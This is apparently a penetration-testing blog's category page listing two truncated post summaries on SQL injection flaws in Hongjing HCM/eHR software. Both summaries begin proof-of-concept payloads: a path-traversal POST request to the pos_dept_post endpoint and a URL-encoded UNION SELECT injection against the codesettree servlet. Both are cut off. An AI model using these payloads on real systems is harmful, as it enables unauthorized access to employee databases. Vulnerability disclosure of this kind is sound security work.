Post category - Penetration Testing
宏景 (Hongjing) HCM pos_dept_post SQL injection vulnerability
Summary: Vulnerability reproduction: PoC: POST /templates/attestation/../../pos/roleinfo/pos_dept_post HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleW
宏景 (Hongjing) HCM codesettree SQL injection
Summary: Affected scope: 宏景 (Hongjing) eHR < 8.2. Login page. Query cusername: /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27~31~27~2